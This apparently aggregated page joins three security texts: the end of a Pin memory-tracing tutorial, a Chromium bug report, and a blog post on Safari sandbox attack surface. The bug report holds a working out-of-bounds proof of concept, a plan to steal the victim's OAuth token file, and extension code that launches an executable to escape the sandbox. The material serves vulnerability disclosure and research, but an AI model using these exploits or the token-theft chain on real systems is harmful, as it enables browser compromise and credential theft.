                RTN_InsertCall(vrallocRtn, IPOINT_AFTER, (AFUNPTR)LogAfterVirtualAlloc,
                    IARG_FUNCRET_EXITPOINT_VALUE, IARG_END);
                RTN_Close(vrallocRtn);
            }
        }
        if (undFuncName == "VirtualFreeEx") {
            RTN vrfreeRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym));
            if (RTN_Valid(vrfreeRtn)) {
                RTN_Open(vrfreeRtn);
                RTN_InsertCall(vrfreeRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeVirtualFree,
                    IARG_FUNCARG_ENTRYPOINT_VALUE, 1, IARG_END);
                RTN_Close(vrfreeRtn);
            }
        }
    }
}

// At exit, report every address that is still marked as allocated
VOID FinalFunc(INT32 code, VOID *v) {
    for (pair<ADDRINT, bool> p : MallocMap) {
        if (!p.second)
            LogFile << "[*] Memory at address 0x" << hex << p.first << " allocated but not freed" << endl;
    }
    LogFile.close();
}

int main(int argc, char *argv[]) {
    PIN_InitSymbols();
    PIN_Init(argc, argv);
    LogFile.open(LogFileName.Value().c_str());
    LogFile << "## Memory tracing for PID = " << PIN_GetPid() << " started" << endl;
    if (EnumSymbols.Value())
        LogFile << "### Listing Symbols" << endl;
    else
        LogFile << "### Started tracing after '" << EntryPoint.Value().c_str() << "()' call" << endl;
    IMG_AddInstrumentFunction(CustomInstrumentation, NULL);
    PIN_AddFiniFunction(FinalFunc, NULL);
    PIN_StartProgram();
    return 0;
}

This Pintool supports a couple of new options. If you look at the KNOB switches (below), you’ll see the two of them.

KNOB<string> EntryPoint(KNOB_MODE_WRITEONCE, "pintool", "entrypoint", "main", "Guest entry-point function");
KNOB<BOOL> EnumSymbols(KNOB_MODE_WRITEONCE, "pintool", "symbols", "0", "List Symbols");

You can specify the entry-point function of the target/guest application you want to trace. Why is this useful?
If you don’t do it, all the initialization code will also be traced and it will become very hard to make sense of the output of our Pintool. Try it. By default, the tracing will start only after the function main is called. Obviously, if our target/guest application doesn’t have a main function, we’ll end up with an empty output file.

Let’s look at a specific example: the Windows calc.exe. This binary doesn’t have a main function. So we run our Pintool as shown below.

C:\pin>pin -t source\tools\WinMallocTracer\Release\WinMallocTracer.dll -- calc.exe

We’ll get the following output.

## Memory tracing for PID = 1732 started
### Started tracing after 'main()' call

This is expected, since calc.exe doesn’t have a main function. So, if we want to trace calc.exe or any other binary, we’ll need to find its entry-point (or any other call after which we want to start our trace). We can open it in IDA, for example, or we can use the other KNOB switch (-symbols) as shown below to list all the symbols.

C:\pin>pin -t source\tools\WinMallocTracer\Release\WinMallocTracer.dll -symbols 1 -- calc.exe

Then we look at the output file (by default memprofile.out) to see if we can find the function we are looking for.

C:\pin> type memprofile.out
## Memory tracing for PID = 5696 started
### Listing Symbols
unnamedImageEntryPoint
InterlockedIncrement
InterlockedDecrement
InterlockedExchange
InterlockedCompareExchange
InterlockedExchangeAdd
KernelBaseGetGlobalData
unnamedImageEntryPoint
GetErrorMode
SetErrorMode
CreateIoCompletionPort
PostQueuedCompletionStatus
GetOverlappedResult
(...)

If you want to see the whole contents of the file you can find it here. The first line is quite interesting though, and it’s probably what we are looking for (unnamedImageEntryPoint). So we can use our Pintool as shown below.
C:\pin>pin -t source\tools\WinMallocTracer\Release\WinMallocTracer.dll -entrypoint unnamedImageEntryPoint -- calc.exe

And if we look at the output this time we’ll get something like:

C:\pin> type memprofile.out
## Memory tracing for PID = 6656 started
### Started tracing after 'unnamedImageEntryPoint()' call
[*] RtlAllocateHeap(32) = 0x4d9098
[*] RtlAllocateHeap(564) = 0x2050590
[*] RtlAllocateHeap(520) = 0x4dcb18
[*] RtlAllocateHeap(1024) = 0x4dd240
[*] RtlAllocateHeap(532) = 0x20507d0
[*] RtlAllocateHeap(1152) = 0x20509f0
[*] RtlAllocateHeap(3608) = 0x4dd648
[*] RtlAllocateHeap(1804) = 0x2050e78
[*] RtlFreeHeap(0x4dd648)
(...)

If you want to see the whole contents of the file you can find it here. As you’ll see, it’s still hard to read and make sense of the output. As I mentioned before, this Pintool can tell that there’s a problem, but not where it is. I’ll try to improve the Pintool, and if you are interested you can follow its future developments here. At the very least, every time I detect an issue I’ll add a PIN_ApplicationBreakpoint. In some cases it might still be very hard to locate the issue, but it’s a starting point. There are also a lot of false positives, as you can see in the output of calc.exe. To validate that the Pintool is actually working we can use the following sample target/guest (I called it ExercisePin2.exe).
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define PAGELIMIT 80

int my_heap_functions(char *buf) {
    HLOCAL h1 = 0, h2 = 0, h3 = 0, h4 = 0;

    h1 = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 260);
    h2 = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 260);  // never freed on purpose
    HeapFree(GetProcessHeap(), 0, h1);
    h3 = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 520);
    h4 = HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, h3, 1040);
    HeapFree(GetProcessHeap(), 0, h4);
    return 0;
}

int my_virtual_functions(char *buf) {
    LPVOID lpvBase;
    DWORD dwPageSize;
    BOOL bSuccess;
    SYSTEM_INFO sSysInfo;       // Useful information about the system

    GetSystemInfo(&sSysInfo);   // Initialize the structure.
    dwPageSize = sSysInfo.dwPageSize;

    // Reserve pages in the virtual address space of the process.
    lpvBase = VirtualAlloc(
        NULL,                   // System selects address
        PAGELIMIT*dwPageSize,   // Size of allocation
        MEM_RESERVE,            // Allocate reserved pages
        PAGE_NOACCESS);         // Protection = no access
    if (lpvBase == NULL) {
        // exit() takes an int status, so print the message separately
        fprintf(stderr, "VirtualAlloc reserve failed.\n");
        exit(1);
    }

    bSuccess = VirtualFree(
        lpvBase,                // Base address of block
        0,                      // Must be 0 with MEM_RELEASE
        MEM_RELEASE);           // Release the pages
    return 0;
}

int main(void) {
    my_heap_functions("moo");
    my_virtual_functions("moo");
    return 0;
}

You can find the Visual Studio project here. You can play with it and compare the output with what’s expected based on the ExercisePin2.c source code.

C:\pin>pin -t source\tools\WinMallocTracer\Release\WinMallocTracer.dll -symbols 1 -- C:\TARGET\ExercisePin2.exe
C:\pin> type memprofile.out
## Memory tracing for PID = 5600 started
### Listing Symbols
_enc$textbss$end
unnamedImageEntryPoint
main
my_heap_functions
my_virtual_functions
HeapAlloc
HeapReAlloc
HeapFree
GetProcessHeap
GetSystemInfo
(...)

The full output is here. Since the entry-point function is main, we can simply run the Pintool without passing anything to it.
C:\pin>pin -t source\tools\WinMallocTracer\Release\WinMallocTracer.dll -- C:\TARGET\ExercisePin2.exe
C:\pin> type memprofile.out
## Memory tracing for PID = 4396 started
### Started tracing after 'main()' call
[*] RtlAllocateHeap(260) = 0x41dd30
[*] RtlAllocateHeap(260) = 0x41de40
[*] RtlFreeHeap(0x41dd30)
[*] RtlAllocateHeap(520) = 0x41df50
[*] RtlHeapfree(0x41df50) from RtlHeapRealloc()
[*] RtlHeapReAlloc(1040) = 0x41df50
[*] RtlFreeHeap(0x41df50)
[*] VirtualAllocEx(327680) = 0x2410000
[*] VirtualFreeEx(0x2410000)
[*] Memory at address 0x41de40 allocated but not freed

As we can see, tracing memory calls is tricky, but achievable. I’ll try to add a few more things to this WinMallocTracer Pintool in the near future. Keep an eye on GitHub if you fancy.

Final notes

As we saw, playing with a DBI framework is not that hard; the challenge lies in doing it right, that is, handling all the corner cases efficiently. Something that looks fairly easy can become very challenging if we are going to do it right. The example tool I chose came from a specific need, and from a vulnerability discovery perspective DBI frameworks are indeed very useful. There’s a lot of room for improvement, and I plan to keep working on it.

Even though it was the fuzzing subject that brought me here (that is, playing with DBI frameworks), I ended up not talking much about the relationship between the two. Keep in mind that a DBI tool per se won’t find many bugs unless you exercise as many code paths as possible. After all, a DBI system only modifies the code that’s executed. So it’s easy to understand that we need to combine it with a coverage-guided fuzzer to discover more bugs (preferably exploitable ones).

DBI systems are here to stay. They emerged as a means of bypassing the restrictions imposed by binary code, or the lack of access to source code. The need to understand and modify the runtime behavior of computer programs is undeniable. The field of dynamic binary modification is evolving very fast.
New applications and new complex engineering challenges are appearing constantly and static binary patching and hooking are “things” from the past. This post documents the first steps if you want to get into this area. All the code snippets used are available at my GitHub.

Source: http://deniable.org/reversing/binary-instrumentation
1 point
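The bookkeeping that lets the WinMallocTracer Pintool flag double frees and leaks can be isolated from Pin entirely. The following is a minimal sketch, assuming a simplified model: the class name AllocTracker and its method names are hypothetical and do not appear in the original tool, and unlike the Pintool it silently re-marks an already-live address instead of printing an error.

```cpp
#include <cstdint>
#include <map>
#include <string>
#include <vector>

// Hypothetical stand-in for the Pintool's MallocMap: address -> "has been freed".
class AllocTracker {
public:
    // Record a successful allocation (roughly what LogAfterMalloc does).
    void on_alloc(std::uint64_t addr) {
        if (addr == 0) return;   // failed allocation, nothing to track
        freed_[addr] = false;    // mark (or re-mark) the block as live
    }

    // Record a free and classify it (roughly what LogFree does).
    std::string on_free(std::uint64_t addr) {
        auto it = freed_.find(addr);
        if (it == freed_.end()) return "unallocated";  // never seen this address
        if (it->second) return "double-free";          // already marked as freed
        it->second = true;                             // mark it as freed
        return "ok";
    }

    // Blocks still live at exit (roughly what FinalFunc reports).
    std::vector<std::uint64_t> leaks() const {
        std::vector<std::uint64_t> out;
        for (const auto& entry : freed_)
            if (!entry.second) out.push_back(entry.first);
        return out;
    }

private:
    std::map<std::uint64_t, bool> freed_;
};
```

Feeding it the heap events from the ExercisePin2.exe trace (allocate 0x41dd30 and 0x41de40, free 0x41dd30) leaves 0x41de40 as the only entry returned by leaks(), which matches the "allocated but not freed" line in the Pintool output.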
-
VULNERABILITY DETAILS

= Out-of-bounds access vulnerability in Array.concat()

I use a bug in Array.concat() to execute arbitrary code in a sandbox.

----------------------------------------------------------------------
v8/src/runtime.cc [1]

RUNTIME_FUNCTION(Runtime_ArrayConcat) {
  HandleScope handle_scope(isolate);
  ASSERT(args.length() == 1);
  CONVERT_ARG_HANDLE_CHECKED(JSArray, arguments, 0);
  int argument_count = static_cast<int>(arguments->length()->Number());
  RUNTIME_ASSERT(arguments->HasFastObjectElements());
  Handle<FixedArray> elements(FixedArray::cast(arguments->elements()));

  // Pass 1: estimate the length and number of elements of the result.
  // The actual length can be larger if any of the arguments have getters
  // that mutate other arguments (but will otherwise be precise).
  // The number of elements is precise if there are no inherited elements.
  ElementsKind kind = FAST_SMI_ELEMENTS;
  uint32_t estimate_result_length = 0;
  uint32_t estimate_nof_elements = 0;
  for (int i = 0; i < argument_count; i++) {
    HandleScope loop_scope(isolate);
    Handle<Object> obj(elements->get(i), isolate);
    uint32_t length_estimate;
    uint32_t element_estimate;
    if (obj->IsJSArray()) {
      Handle<JSArray> array(Handle<JSArray>::cast(obj));
      length_estimate = static_cast<uint32_t>(array->length()->Number());  <<<<< Comment 1. This is the first time the array's length field is read.
      if (length_estimate != 0) {
        ElementsKind array_kind = GetPackedElementsKind(array->map()->elements_kind());
        if (IsMoreGeneralElementsKindTransition(kind, array_kind)) {
          kind = array_kind;
        }
      }
      element_estimate = EstimateElementCount(array);
    } else {
      if (obj->IsHeapObject()) {
        if (obj->IsNumber()) {
          if (IsMoreGeneralElementsKindTransition(kind, FAST_DOUBLE_ELEMENTS)) {
            kind = FAST_DOUBLE_ELEMENTS;
          }
        } else if (IsMoreGeneralElementsKindTransition(kind, FAST_ELEMENTS)) {
          kind = FAST_ELEMENTS;
        }
      }
      length_estimate = 1;
      element_estimate = 1;
    }
    // Avoid overflows by capping at kMaxElementCount.
    if (JSObject::kMaxElementCount - estimate_result_length < length_estimate) {
      estimate_result_length = JSObject::kMaxElementCount;
    } else {
      estimate_result_length += length_estimate;  <<<<< Comment 2. length_estimate, which is initialized in [Comment 1], is added to estimate_result_length.
    }
    if (JSObject::kMaxElementCount - estimate_nof_elements < element_estimate) {
      estimate_nof_elements = JSObject::kMaxElementCount;
    } else {
      estimate_nof_elements += element_estimate;
    }
  }
  ...
  ...
  Handle<FixedArray> storage;
  if (fast_case) {
    // The backing storage array must have non-existing elements to preserve
    // holes across concat operations.
    storage = isolate->factory()->NewFixedArrayWithHoles(  <<<<< Comment 3. Create an array of size estimate_result_length.
        estimate_result_length);
  } else {
    // TODO(126): move 25% pre-allocation logic into Dictionary::Allocate
    uint32_t at_least_space_for = estimate_nof_elements + (estimate_nof_elements >> 2);
    storage = Handle<FixedArray>::cast(
        SeededNumberDictionary::New(isolate, at_least_space_for));
  }

  ArrayConcatVisitor visitor(isolate, storage, fast_case);

  for (int i = 0; i < argument_count; i++) {
    Handle<Object> obj(elements->get(i), isolate);
    if (obj->IsJSArray()) {
      Handle<JSArray> array = Handle<JSArray>::cast(obj);
      if (!IterateElements(isolate, array, &visitor)) {  <<<<< Comment 4. Call IterateElements()
        return isolate->heap()->exception();
      }
    } else {
      visitor.visit(0, obj);
      visitor.increase_index_offset(1);
    }
  }

  if (visitor.exceeds_array_limit()) {
    return isolate->Throw(
        *isolate->factory()->NewRangeError("invalid_array_length", HandleVector<Object>(NULL, 0)));
  }
  return *visitor.ToArray();  <<<<< Comment 5. ToArray() creates a corrupted Array.
}
----------------------------------------------------------------------

Here are the details on IterateElements() and ToArray().

----------------------------------------------------------------------
v8/src/runtime.cc [1]

static bool IterateElements(Isolate* isolate, Handle<JSArray> receiver, ArrayConcatVisitor* visitor) {
  uint32_t length = static_cast<uint32_t>(receiver->length()->Number());  <<<<< 4.1. This is the second time the array's length field is read.
  switch (receiver->GetElementsKind()) {
    ...
  }
  visitor->increase_index_offset(length);  <<<<<<<<<<
  return true;
}

void increase_index_offset(uint32_t delta) {
  if (JSObject::kMaxElementCount - index_offset_ < delta) {
    index_offset_ = JSObject::kMaxElementCount;
  } else {
    index_offset_ += delta;  <<<<<<<<<
  }
}
----------------------------------------------------------------------
----------------------------------------------------------------------
Handle<JSArray> ToArray() {
  Handle<JSArray> array = isolate_->factory()->NewJSArray(0);
  Handle<Object> length =
      isolate_->factory()->NewNumber(static_cast<double>(index_offset_));  <<<<< 5.1. The local variable length is initialized from the member variable index_offset_.
  Handle<Map> map = JSObject::GetElementsTransitionMap(
      array, fast_elements_ ? FAST_HOLEY_ELEMENTS : DICTIONARY_ELEMENTS);
  array->set_map(*map);
  array->set_length(*length);  <<<<<
  array->set_elements(*storage_);  <<<<< 5.2. However, storage_ was created with the size from [Comment 3].
  return array;
}
----------------------------------------------------------------------

(I can't be entirely sure whether the above analysis is accurate.)

Here is a proof-of-concept.

----------------------------------------------------------------------
a = [1];
b = [];
a.__defineGetter__(0, function () { b.length = 0xffffffff; });
c = a.concat(b);
console.log(c);
----------------------------------------------------------------------

= From out-of-bounds to code execution

Using the out-of-bounds vulnerability in Array, an attacker can trigger a use-after-free to execute code.

1. Create a 2D Array which contains corrupted Arrays(###) and normal Arrays(o), alternating.
[###########][ o ][###########][ o ][###########][ o ][###########][ o ]
2. Free all normal Arrays(o) and the 2D Array.
3. Reference a freed normal Array(o) through a corrupted Array(###).
---------|
[###########][ o ][###########][ o ][###########][ o ][###########][ o ]
4. The memory is not entirely cleared, even though the normal Array(o) was freed, so we can still use it as a normal object.
5. Get an ArrayBuffer allocated on top of the freed normal Array(o) by creating many ArrayBuffers.
6. Through the freed normal Array(o), manipulate the ArrayBuffer's properties (byteLength, buffer address) to get arbitrary memory access.

P.S. The exploit is not optimized.

= Sandbox bypassing via chrome extension

Here, I describe the exploit scenario and explain the sandbox escape.

Step 0. The victim opens a malicious web page (the exploit).
Step 1. The exploit makes the victim download an html page which will be executed on the file:// origin.
Step 2. After triggering the code execution vulnerability, open the html page (the one from step 1) with NavigateContentWindow (it uses the same functionality as chrome.embeddedSearch.newTabPage.navigateContentWindow of chrome://newtab).
Step 3. Because the origin is file://, the attacker can access (read) local files. Where SecurityOrigin gets in the way, use the code execution flaw to change the SecurityOrigin.
Step 4. Upload the user's OAuth token information (%localappdata%/Google/Chrome/User Data/Default/Web Data) to the attacker's server.
Step 5. From now on, we can synchronize Chrome with the user's token (I'm not sure whether there is an additional security mechanism on OAuth for synchronizing the Chrome browser).
Step 6. Install an extension on the synchronized Chrome.
Step 7. During synchronization, the user's Chrome installs the extension too.

[Step 4] may take time. On Windows, the token file is encrypted with DPAPI, so bruteforcing the Windows login password is required to use the master key file at %appdata%/Microsoft/Protect/.

[Step 6] uses a vulnerability(?) in extensions to bypass the sandbox. In chrome://settings-frame/settings, the user can change download.default_directory.
Using chrome.downloads.showDefaultFolder(), a Chrome extension can open the directory set in download.default_directory, but Chrome doesn’t check whether that path is a file or a directory (in the case of a file, Chrome executes it). So a malicious attacker can bypass the sandbox by setting download.default_directory to an executable on an external server (e.g. \\host\hihi.exe) and then calling chrome.downloads.showDefaultFolder().

I use the debugger API for extensions to run JavaScript on chrome://settings-frame/settings. In general, a url starting with chrome:// is not attachable, but simple tricks such as the following work.

view-source:chrome://settings-frame/settings
about:settings-frame/settings

Chrome extension code for sandbox escaping
----------------------------------------------------------------------
// Busy-wait for the given number of milliseconds
function sleep(milliseconds) {
  var start = new Date().getTime();
  for (;;) {
    if ((new Date().getTime() - start) > milliseconds) break;
  }
}

chrome.tabs.create({url: "about:settings-frame/settings"}, function (tab) {
  chrome.debugger.attach({tabId: tab.id}, "1.0", function () {
    sleep(1000);
    // Save the old download directory, then point it at an executable
    chrome.debugger.sendCommand({tabId: tab.id}, "Runtime.evaluate",
      {expression: 'old = document.getElementById("downloadLocationPath").value; chrome.send("setStringPref", ["download.default_directory", "c:\\\\windows\\\\system32\\\\calc.exe"]);'},
      function (o) {
        sleep(100);
        chrome.downloads.showDefaultFolder(); //open calc
        // Restore the original download directory and close the tab
        chrome.debugger.sendCommand({tabId: tab.id}, "Runtime.evaluate",
          {expression: 'chrome.send("setStringPref", ["download.default_directory", old]); window.close();'});
      });
  });
});
----------------------------------------------------------------------

Tested on Windows 7

VERSION
Chrome Version: 35.0.1916.153 stable
Operating System: Windows 7

Source: https://bugs.chromium.org/p/chromium/issues/detail?id=386988
1 point
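The root cause in the report above is that the array length is read once to size the backing store and again while iterating, with attacker code able to run in between. The following is a minimal sketch of that pattern only, assuming a toy model: ToyArray, ConcatResult, toy_concat and capped_add are hypothetical names, and nothing here is V8 code.

```cpp
#include <cstdint>
#include <functional>
#include <vector>

// Toy model of a JS array: a length plus an optional callback that stands in
// for an element getter running while the array is being iterated.
struct ToyArray {
    std::uint32_t length = 0;
    std::function<void()> on_visit;
};

struct ConcatResult {
    std::uint32_t storage_size;     // capacity chosen in pass 1
    std::uint32_t reported_length;  // length accumulated in pass 2
};

// Saturating add, mirroring the "cap at kMaxElementCount" checks in the report.
static std::uint32_t capped_add(std::uint32_t a, std::uint32_t b) {
    const std::uint32_t kMax = 0xffffffffu;
    return (kMax - a < b) ? kMax : a + b;
}

ConcatResult toy_concat(const std::vector<ToyArray*>& args) {
    // Pass 1: size the backing store from the lengths as they are right now.
    std::uint32_t estimate = 0;
    for (ToyArray* a : args) estimate = capped_add(estimate, a->length);

    // Pass 2: each length is read a second time; getters may run in between
    // and change the length of arguments that have not been visited yet.
    std::uint32_t index_offset = 0;
    for (ToyArray* a : args) {
        std::uint32_t length = a->length;  // second read
        if (a->on_visit) a->on_visit();    // attacker-controlled code
        index_offset = capped_add(index_offset, length);
    }
    return {estimate, index_offset};
}
```

Modelling the proof-of-concept (a has length 1 and a callback that sets the length of b to 0xffffffff, b starts empty) gives a storage size of 1 but a reported length of 0xffffffff, which is the mismatch that ToArray() then turns into an out-of-bounds array.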
-
Cracking the Walls of the Safari Sandbox
Fuzzing the macOS WindowServer for Exploitable Vulnerabilities
July 25, 2018 / Patrick Biernat & Markus Gaasedelen

When exploiting real world software or devices, achieving arbitrary code execution on a system may only be the first step towards total compromise. For high value or security conscious targets, remote code execution is often succeeded by a sandbox escape (or a privilege escalation) and persistence. Each of these stages usually requires its own entirely unique exploit, making some weaponized zero-days a ‘chain’ of exploits.

Considered high risk consumer software, modern web browsers use software sandboxes to contain damage in the event of remote compromise. Having exploited Apple Safari in the previous post, we turn our focus towards escaping the Safari sandbox on macOS in an effort to achieve total system compromise.

Using Frida to fuzz the macOS WindowServer from the lockscreen

As the fifth blogpost of our Pwn2Own series, we will discuss our experience evaluating the Safari sandbox on macOS for security vulnerabilities. We will select a software component exposed to the sandbox, and utilize Frida to build an in-process fuzzer as a means of discovering exploitable vulnerabilities.

Software Sandboxes

Software sandboxing is often accomplished by restricting the runtime privileges of an application through platform-dependent security features provided by the operating system. When layered appropriately, these security controls can limit the application’s ability to communicate with the broader system (syscall filtering, service ACLs), prevent it from reading/writing files on disk, and block external resources (networking). Tailored to a specific application, a sandbox will aggressively reduce the system’s exposure to a potentially malicious process, preventing the process from making persistent changes to the machine.
As an example, a compromised but sandboxed application cannot ransomware user files on disk if the process was not permitted filesystem access.

A diagram of the old Adobe Reader Protected Mode Sandbox, circa 2010

Over the past several years we have seen sandboxes grow notably more secure in isolating problematic software. This has brought about discussion regarding the value of a theoretically perfect software sandbox: when properly contained, does it really matter if an attacker can gain arbitrary code execution on a machine?

The answer to this question has been hotly debated amongst security researchers. This discussion has been further aggravated by the contrasting approaches to browser security taken by Microsoft Edge and Google Chrome. Where one leads with in-process exploit mitigations (Edge), the other is a poster child for isolation technology (Chrome).

As a simple barometer, the Pwn2Own results over the past several years seem to indicate that sandboxing is winning when put toe-to-toe against advanced in-process mitigations. There are countless opinions on why this may be the case, and whether this trend holds true for the real world.

To state it plainly, as attackers we do think that sandboxes (when done right) add considerable value towards securing software. More importantly, this is an opinion shared by many familiar with attacking these products.

THE (MEMORY CORRUPTION) SAFETY DANCE (13:25) at SAS 2017, by Mark Dowd

However, as technology improves and gives way to mitigations such as strict control flow integrity (CFI), these views may change. The recent revelations wrought by Meltdown & Spectre are a great example of this, putting cracks into even the theoretically perfect sandbox.

At the end of the day, both sandboxing and mitigation technologies will continue to improve and evolve. They are not mutually exclusive, and both play an important role in raising the costs of exploitation in different ways.
macOS Sandbox Profiles

On macOS, there is a powerful low-level sandboxing technology called ‘Seatbelt’ which Apple has deprecated (publicly) in favor of the higher level ‘App Sandbox’. With little-to-no official documentation available, information on how to use the former system sandbox has been learned through reverse engineering efforts by the community (1,2,3,4,5, …).

To be brief, the walls of Seatbelt-based macOS sandboxes are built using rules that are defined in a human-readable sandbox profile. A few of these sandbox profiles live on disk, each tailored to the needs of a specific application.

For the Safari browser, the sandbox profile is composed of the following two files (locations may vary):

    /System/Library/Sandbox/Profiles/system.sb
    /System/Library/StagedFrameworks/Safari/WebKit.framework/Versions/A/Resources/com.apple.WebProcess.sb

The macOS sandbox profiles are written in a language called TinyScheme. Profiles are often written as a whitelist of actions or services required by the application, disallowing access to much of the broader system by default.

    ...
    (version 1)
    (deny default (with partial-symbolication))
    (allow system-audit file-read-metadata)

    (import "system.sb")

    ;;; process-info* defaults to allow; deny it and then allow operations we actually need.
    (deny process-info*)
    (allow process-info-pidinfo)
    ...

For example, the sandbox profile can whitelist explicit directories or files that the sandboxed application should be permitted to access. Here is a snippet from the WebProcess.sb profile, allowing Safari read-only access to certain directories that store user preferences on disk:

    ...
    ;; Read-only preferences and data
    (allow file-read*
        ;; Basic system paths
        (subpath "/Library/Dictionaries")
        (subpath "/Library/Fonts")
        (subpath "/Library/Frameworks")
        (subpath "/Library/Managed Preferences")
        (subpath "/Library/Speech/Synthesizers")
    ...
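The deny-by-default whitelist idea behind the snippet above can be illustrated with a toy model. This is only a sketch: the function names `isUnderSubpath` and `mayRead` are hypothetical, the path list is copied from the snippet, and the real Seatbelt rule evaluation is certainly more involved than a prefix test (no path normalization is attempted here).

```javascript
// Toy model of a deny-by-default read whitelist; NOT how Seatbelt works internally.
// The paths are the ones listed in the WebProcess.sb snippet above.
const readOnlySubpaths = [
  "/Library/Dictionaries",
  "/Library/Fonts",
  "/Library/Frameworks",
  "/Library/Managed Preferences",
  "/Library/Speech/Synthesizers",
];

// True when `path` is the directory itself or lies somewhere beneath it.
// Appending "/" prevents "/Library/FontsEvil" from matching "/Library/Fonts".
function isUnderSubpath(path, root) {
  return path === root || path.startsWith(root + "/");
}

// Deny by default: a read is allowed only if a whitelisted subpath covers it.
function mayRead(path) {
  return readOnlySubpaths.some((root) => isUnderSubpath(path, root));
}

for (const path of [
  "/Library/Fonts/Arial.ttf",
  "/Library/FontsEvil/payload",
  "/Users/victim/Documents/secret.txt",
]) {
  console.log(path, mayRead(path) ? "allow" : "deny");
}
```

Anything not explicitly listed falls through to "deny", which is why the profile doubles as an inventory of reachable resources.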
Serving almost like horse blinders, sandbox profiles help focus our attention (as attackers) by listing exactly what non-sandboxed resources we can interface with on the system. This helps enumerate relevant attack surface that can be probed for security defects.

Escaping Sandboxes

In practice, sandbox escapes are often their own standalone exploit. This means that an exploit to escape the browser sandbox is almost always entirely unique from the exploit used to achieve initial remote code execution.

When escaping software sandboxes, it is common to attack code that executes outside of a sandboxed process. By exploiting the kernel or an application (such as a system service) running outside the sandbox, a skilled attacker can pivot themselves into an execution context where there is no sandbox.

The Safari sandbox policy explicitly whitelists a number of external software attack surfaces. As an example, the policy snippet below highlights a number of IOKit interfaces which can be accessed from the sandbox. This is because they expose system controls that are required by certain features in the browser.

    ...
    ;; IOKit user clients
    (allow iokit-open
        (iokit-user-client-class "AppleMultitouchDeviceUserClient")
        (iokit-user-client-class "AppleUpstreamUserClient")
        (iokit-user-client-class "IOHIDParamUserClient")
        (iokit-user-client-class "RootDomainUserClient")
        (iokit-user-client-class "IOAudioControlUserClient")
    ...

Throughout the profile, entries that begin with iokit-* refer to functionality we can invoke via the IOKit framework. These are the userland client interfaces that one can use to communicate with their relevant kernel counterparts (kexts).

Another interesting class of rules defined in the sandbox profile falls under allow mach-lookup:

    ...
    ;; Remote Web Inspector
    (allow mach-lookup
        (global-name "com.apple.webinspector"))

    ;; Various services required by AppKit and other frameworks
    (allow mach-lookup
        (global-name "com.apple.FileCoordination")
        (global-name "com.apple.FontObjectsServer")
        (global-name "com.apple.PowerManagement.control")
        (global-name "com.apple.SystemConfiguration.configd")
        (global-name "com.apple.SystemConfiguration.PPPController")
        (global-name "com.apple.audio.SystemSoundServer-OSX")
        (global-name "com.apple.analyticsd")
        (global-name "com.apple.audio.audiohald")
    ...

The allow mach-lookup keyword depicted above is used to permit the sandboxed application access to various remote procedure call (RPC)-like servers hosted within system services. These policy definitions allow our application to communicate with these whitelisted RPC servers over the mach IPC.

Additionally, there are some explicitly whitelisted XPC services:

    ...
    (deny mach-lookup (xpc-service-name-prefix ""))
    (allow mach-lookup
        (xpc-service-name "com.apple.accessibility.mediaaccessibilityd")
        (xpc-service-name "com.apple.audio.SandboxHelper")
        (xpc-service-name "com.apple.coremedia.videodecoder")
        (xpc-service-name "com.apple.coremedia.videoencoder")
    ...

XPC is a higher-level IPC mechanism used to facilitate communication between processes, again built on top of the mach IPC. XPC is fairly well documented, with a wealth of resources and security research available for it online (1,2,3,4, …).

There are a few other interesting avenues for attacking non-sandboxed code, including making syscalls directly to the XNU kernel, or going through IOCTLs. We did not look at these surfaces due to time constraints.

Our evaluation of the sandbox was brief, so our knowledge and insight only extend so far. A more interesting exercise for the future would be to enumerate attack surface that currently cannot be restrained by sandbox policies.
Target Selection

Having surveyed some of the components exposed to the Safari sandbox, the next step was to decide what we felt would be easiest to target as a means of escape.

Attacking components that live in the macOS Kernel is attractive: successful exploitation guarantees not only a sandbox escape, but also unrestricted ring-zero code execution. With the introduction of ‘rootless’ in macOS 10.11 (El Capitan), a kernel mode privilege escalation is necessary to do things such as loading unsigned drivers without disabling SIP.

The downside of attacking kernel code is the cost in debuggability and convenience. Tooling to debug or instrument kernel code is primitive, poorly documented, or largely non-existent. Reproducing bugs, analyzing crashes, or stabilizing an exploit often requires a full system reboot, which can be taxing on time and morale.

After weighing these traits and reviewing public research on past Safari sandbox escapes, we zeroed in on the WindowServer, a complex usermode system service that was accessible to the Safari sandbox over the mach IPC:

    (allow mach-lookup
        ...
        (global-name "com.apple.windowserver.active")
        ...
    )

For our purposes, WindowServer appeared to be nearly an ideal target:

* Nearly every process can communicate with it (Safari included)
* It lives in userland, simplifying debugging and introspection
* It runs with permissions essentially equivalent to root
* It has a relatively large attack surface
* It has a notable history of security vulnerabilities

WindowServer is a closed-source, private framework (a library), which implies developers are not meant to interface with it directly. This also means that official documentation is non-existent, and what little information is available publicly is thin, dated, or simply incomplete.

WindowServer Attack Surface

WindowServer works by processing incoming mach_messages from applications running on the system. On macOS, mach_messages are a form of IPC to enable communication between running processes.
The Mach IPC is generally used by system services to expose an RPC interface for other applications to call into.

Under the hood, virtually every GUI macOS application transparently communicates with the WindowServer. As hinted by its name, the WindowServer system service is responsible for actually drawing application windows to the screen. A running application will tell the WindowServer (via RPC) what size or shape to make the window, and where to put it:

[Figure: The WindowServer renders virtually all desktop applications on macOS]

For those familiar with Microsoft Windows, the macOS WindowServer is a bit like a usermode Win32k, albeit less complex. It is also responsible for drawing the mouse cursor, managing hotkeys, and facilitating some cross-process communication (among many other things).

Applications can interface with the WindowServer over the mach IPC to reach some 600 RPC-like functions. When the privileged WindowServer system service receives a mach_message, it will be routed to its respective message handler (a ‘remote procedure’) coupled with foreign data to be parsed by the handler function.

[Figure: A selection of WindowServer mach message handlers]

As an attacker, these functions prefixed with _X... (such as _XBindSurface) represent directly accessible attack surface. From the Safari sandbox, we can send arbitrary mach messages (data) to the WindowServer targeting any of these functions. If we can find a vulnerability in one of these functions, we may be able to exploit the service.

We found that these some 600 handler functions are split among three MIG-generated mach subsystems within the WindowServer.
Each subsystem has its own message dispatch routine, which initially parses the header of the incoming mach message and then passes the message-specific data on to its appropriate handler via an indirect call:

[Figure: RAX is a code pointer to a message handler function that is selected based on the incoming message id]

